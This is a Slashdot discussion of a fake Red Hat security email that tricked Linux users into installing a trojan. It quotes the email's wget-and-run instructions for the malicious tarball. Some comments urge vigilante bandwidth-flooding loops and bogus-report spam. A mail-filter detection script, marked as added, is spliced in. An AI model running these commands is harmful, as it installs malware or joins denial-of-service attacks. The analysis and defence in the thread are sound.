Beware 'Fedora-Redhat' Fake Security Alert

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.

  1. I'll try it... by enginuitor · · Score: 5, Interesting

    I am downloading the file to a Knoppix box, and will then disconnect the ethernet cord, run the code, and report back.

    Stay tuned.

    1. Re:I'll try it... by busonerd · · Score: 2, Interesting

      Same here. Let's use this thread for a discussion of wtf it does.

    2. Re:I'll try it... by Anonymous Coward · · Score: 1, Interesting

      ok.. that's just weird. About 2 weeks ago I set work's firewall up to fwd SSH attempts to a sacrificial box on my network (it gave a login prompt but would deny any login attempts). I got a fuckton of login tries from some Czech website with a 'mama' subdomain. About 10 root password guesses, and then 10 guesses of common login names. I didn't think much of it until I saw the names of the temp files created by this phisher.

    3. Re:I'll try it... by Anonymous Coward · · Score: 1, Interesting

      nmap addlebrain.com ...

      Every port is open? Is it running tcpdump?

      Probably is compromised.

  2. Stupid Tricks? by dj_cel · · Score: 5, Interesting

    It seems to me that most people using any version of Linux will not fall victim to these sorts of things. I would expect something like this to work for the majority of Windows users, but as the audience of Linux is mostly tech-savvy, I can't see this becoming a problem. The problem is going to be when larger groups of desktop users make the jump to Linux. What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average PC skills from destroying their systems?

    --
    Those who can make you believe absurdities can make you commit atrocities. - Voltaire
  3. Re: I'll try it... Execution results! by Student_Tech · · Score: 4, Interesting
    From the top of that inst.c file:

    #if 0
    shc Version 3.7, Generic Script Compiler
    Copyright (c) 1994-2003 Francisco Rosales

    shc -v -r -T -f redhat
    #endif


    From shc's manpage:
    shc's main purpose is to protect your shell scripts from modification or inspection. You can use it if you wish to distribute your scripts but don't want them to be easily readable by other people.


    Definitely doing something then, at least viewing the parent post.

  4. Re:text of site by MBCook · · Score: 4, Interesting
    Anyone who reads this and isn't instantly suspicious needs to up their paranoia level. Look at all the mistakes in the grammar! "Redhat found...". If this was from RedHat it would be "Redhat has found" or "We found" or "It has come to our attention" or something like that. "Some of the effected distriubtions include..." should be something more like "RedHat 7.2 and newer are affected" or some such. It would not end in "and not only" (which is terrible English, probably supposed to be "and more"). Plus why would a RedHat security advisory inform people if Solaris or *BSD was affected? I would expect that a link would be given to more information about the vulnerability (not just "see redhat.com" which is basically what's there). Last but not least, what has been RedHat all throughout the advisory becomes "Red Hat" in the last line.

    Beyond those obvious problems, the "best" targets of something like this (businesses) would have people who know better than this. Those people would know how a patch file would work. At minimum the "./inst" section should say "make install", which is much more common. So this would only affect the "newbie" Linux user. Last of all, I would expect that anything RedHat issued would say something like "or get the update through Red Carpet (or whatever their 'Windows Update' is called)".

    This isn't a very well made forgery. They could have easily taken a true RedHat advisory and modified it so the language would be better and sound more plausible. They could have at LEAST gotten someone who knows English better.

    Does anyone else find it strange someone would go through all the trouble of registering a domain name to run this scam? Why not say "download it off the (such and such) mirror at ftp://120.584.391.568/pub/mirror/redhat/patches/patch_file.tar.gz" or something like that. Use any domain name and make it look like a mirror. When was the last time any company put a file for users at "(domainname).com/file.tar.gz"? Never.

    Most people could have done better, IMHO.

    --
    Comment forecast: Bits of genius surrounded by a sea of mediocrity.
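The markers MBCook lists above (unofficial download host, bare tarball at the domain root, "wget then run it" instructions, "and not only", RedHat/Red Hat switching) can be turned into a simple mail-filter heuristic. This is an added example, not code from the thread or from Red Hat; the sample message is constructed to resemble the fake advisory, and the vendor allowlist is an assumption:

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the fake advisory the thread describes
# (not the real message's text).
SAMPLE_EMAIL = """\
From: Redhat Security Team <security@fedora-redhat.com>
Subject: Redhat security update

Redhat found a vulnerability in fileutils. Some of the effected
distributions include Redhat 7.2, Solaris, FreeBSD and not only.
Please run the following from your home directory:

wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
tar zxvf fileutils-1.0.6.patch.tar.gz
./inst

For more information see redhat.com
Red Hat Security Team
"""

# Assumed allowlist of the vendor's own domains; adjust for your site.
OFFICIAL_DOMAINS = ("redhat.com", "fedoraproject.org")

URL_RE = re.compile(r"(?:https?://|ftp://|www\.)\S+")

def _split_url(url: str):
    """Return (host, path); tolerate URLs written without a scheme."""
    if "://" not in url:
        url = "http://" + url
    parsed = urlparse(url)
    return (parsed.hostname or "").lower(), parsed.path

def _official(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in OFFICIAL_DOMAINS)

def update_email_indicators(text: str) -> dict:
    """Flag each marker the thread calls out; True means the marker is present."""
    urls = [_split_url(u) for u in URL_RE.findall(text)]
    return {
        "unofficial_host": any(not _official(h) for h, _ in urls),
        "tarball_at_root": any(re.fullmatch(r"/[^/]+\.tar\.gz", p) for _, p in urls),
        "wget_then_run": bool(re.search(r"^wget\b", text, re.M))
                         and bool(re.search(r"^\./\S+", text, re.M)),
        "mixed_vendor_name": "Redhat" in text and "Red Hat" in text,
        "and_not_only": "and not only" in text.lower(),
    }

def is_suspicious_update(text: str, threshold: int = 2) -> bool:
    """Treat a message as suspect once enough markers co-occur."""
    return sum(update_email_indicators(text).values()) >= threshold
```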
  5. Unauthorized use of RedHat Logo and name by vchoy · · Score: 2, Interesting

    Going to the site, the use of the Redhat logo and the Redhat name itself is in clear violation of the trademark guidelines. I am guessing it will not be too long before this site and domain are taken down.

    My question is: can these a**holes get away with using the 'fedora' name instead?

    ps. I am not affiliated with RH in any way.
    Copyright © 2004 All rights reserved. Redhat is a registered trademark of Redhat (only). No soup for you.

  6. Re:We knew this day would come by antoy · · Score: 5, Interesting

    Yes, but when this kind of thing happened on Windows, it was Windows' fault for not having the proper security mechanisms to stop it. The difference is that Windows will set up all users as administrators, true, but running as a plain user can be very bad too. The fact is, neither of the OSes provides (by default, at least) substantial protection from such attacks.

    Allowing only registered executables to run could be set up to prevent such things. Microsoft signs their patches and programs too, but no regular user will ever check.

    Incorporate such functions in the OS or GUI. Harass the user whenever an executable or shared library is introduced to the system: "Here are the certifications, do you trust this?"

    Limiting permissions up to the user level is not enough anymore: VM based environments such as Java and .NET have program/assembly-based security systems. But although the technology exists, it is very poorly handled, at least in the .NET front where I am experienced: There is no simple wizard to set up settings the way you want them, there is no popup dialog asking you how much you trust this executable and which permissions it should get. Such technology could go a long way in preventing such ridiculously simple attacks from succeeding in the future.

    First time I saw a similar feature was in Kerio Personal Firewall, which would ask every time a new program would attempt to connect somewhere, or have something connect to a port it opened. It was simple and effective, and the 'harassment' was more than worth it (SP2 does something similar, but it's flawed*).

    In conclusion, I want to say that I believe if all people had:

    1) Startup Monitor - Painfully simple, no one should be without it.
    2) Kerio Personal Firewall, or equivalent
    3) An executable monitor as described above.
    the *real* reasons for Windows' pathetic security record would be no more. Never mind those vulnerabilities: I could give you a .exe that would delete all your documents, and you have but to click on it (I swear it decrypts HL2 from the Steam files :-) The same, of course, applies to Linux.


    * SP2 tells you when an executable tries to connect, and waits for you to decide if you want to block it, but it *does* allow the connection to work until you decide what to do with it. Furthermore, I'm not sure if it can tell if an executable was replaced with a compromised version (Kerio has MD5 hashes)

  7. Re:Here's what WHOIS says: by DrLZRDMN · · Score: 2, Interesting

    yes but which Raymond Jackson?

    One's a teacher, one is guilty of child abuse (something to be unpopular for) and one just lost a football game today (/thinks of Ace Ventura plot)

  8. Updated version from a couple of days ago... by Zocalo · · Score: 3, Interesting
    This hit the SpamAssassin mailing list a couple of days ago, the only difference is the location of the file which might help explain the Stanford reference. In the original the line was:

    wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
    but now it's:
    wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz

    Whoever is behind this certainly seems to be doing a very sloppy job of it. Yahoo, Melbourne IT, Stanford, hosting at "everyone.net"; hardly a who's who of dodgy companies and "bullet proof" service providers, is it? Frankly, I'm expecting to be reading a Slashdot story about a bust by the end of the week, and that's being generous.

    --
    UNIX? They're not even circumcised! Savages!
  9. Re:We knew this day would come by fucksl4shd0t · · Score: 4, Interesting

    And allowing only registered executables to run is a bad thing. Who should decide?

    On my computer, I should decide, and the registration dealie should provide me with the information I need to make the decision.

    The two parts of Microsoft's weird DRM thing I disagree with (with regards to running executables) are that the key is inaccessible to me, stashed somewhere in the BIOS, and that Microsoft is the one who decides what is safe and what isn't.

    --
    Like what I said? You might like my music
  10. everyone now.... by Anonymous Coward · · Score: 1, Interesting

    wget -O /dev/null http://www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz

    Let's use all of his bandwidth quota up.

  11. Re:Real link? by acidblood · · Score: 2, Interesting

    This seems like a very good idea. Normally I wouldn't be for vigilante justice, but this guy deserves it.

    I'm running the following script on my box, and I recommend others to do the same.

    while true; do wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz ; rm fileutils-1.0.6.patch.tar.gz; done

    If enough people do the same, either the site is taken offline, or we're gonna cost him a pretty penny.

    --

    Join the NFSNET. Our prime goal is making little numbers out of big ones. http://www.nfsnet.org/

  12. Re: I'll try it... Execution results! by labratuk · · Score: 5, Interesting

    Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

    --
    Malike Bamiyi wanted my assistance.
  13. notifying the appropriate people.... by menscher · · Score: 2, Interesting

    To : abuse@everyone.net,
    abuse@above.net
    Subject : malware using your netblock to propagate

    http://it.slashdot.org/article.pl?sid=04/10/24/2352234&tid=172&tid=110&tid=218&tid=106

    The story reports on a linux trojan that, after installing, emails a
    report back to root@addlebrain.com. The MX record for addlebrain.com
    points to sitemail.everyone.net. It would reduce the effect of this if
    you could shut down that email account.

    Better yet, you should gather the list of infected IPs and then inform
    the owners.

    Damian Menscher
    --
    -=#| Physics Grad Student & SysAdmin @ U Illinois Urbana-Champaign |#=-
    -=#| 488 LLP, 1110 W. Green St, Urbana, IL 61801 Ofc:(217)333-0038 |#=-
    -=#| 4602 Beckman, VMIL/MS, Imaging Technology Group:(217)244-3074 |#=-
    -=#| <menscher@uiuc.edu> www.uiuc.edu/~menscher/ Fax:(217)333-9819 |#=-
    -=#| The above opinions are not necessarily those of my employers. |#=-

  14. Re:The guy seems to be Romanian by at_slashdot · · Score: 2, Interesting

    I confirm, it's Romanian, I translated it in another post, nothing important, the writer is an idiot.

    --
    "It is our choices, Harry, that show what we truly are, far more than our abilities." -- Prof. Dumbledore
  15. Re:We knew this day would come by Erik+Hollensbe · · Score: 2, Interesting

    You have got to be kidding me.

    While I'm not intending to insult anyone's intelligence here, /. is a large group and some pay more attention to security and these kinds of attacks than others. Not to mention, too many people visit here to have "probability = 0" be a realistic assessment.

    'Grandma' should never be in the position to install software, IMO. I've been talking to my grandmother about a linux installation for a while, and I will hold 'the keys' and help her out via ssh. As she's pretty set in her ways with her software choices, it should be pretty simple as far as time is concerned.

    If you want to advocate Linux, don't bother advocating education along with it. Really, if computers were as easy to use as cars it would be one thing, but it's not the case currently and I don't see a future that is accepting of it. Not everyone wants to learn how to pay attention to computer security, heck, some people don't even care enough to program their VCR clock (I know, dated analogy, feh).

  16. Re:We knew this day would come by FireFury03 · · Score: 2, Interesting

    Really, if computers were as easy to use as cars it would be one thing, but it's not the case currently and I don't see a future that is accepting of it.

    Really? IMHO computers probably are as easy as cars. i.e. if my car needs some maintenance, I don't do it myself (at least, not for anything but the most simple stuff - I wouldn't know where to start), I go to the garage and pay someone who knows what he's doing to fix it. The same applies to computers - if you need some maintenance doing to your computer and you don't know enough to do it yourself then you should be paying a professional to look at it.

    Too many people have an attitude of "it should be simple enough for me to maintain" when it comes to computers - I have to ask why? How many people strip down their car engine and then are left with a pile of bits on the floor with no clue how to put them back together and blame the car manufacturer for not making it "easy enough"?

    Just because a computer plugs into the wall like a toaster doesn't mean that the user has a "right" to be able to maintain it without any training. I think people need to get out of the idea that computers are things which you buy and then they don't need any upkeep - computers are definitely things that you buy and then need maintenance every so often. Some of us are knowledgeable enough to do it ourselves, but the rest should get a professional to sort it out. Maybe manufacturers specifying that a computer requires a yearly service by a professional engineer would be a good idea?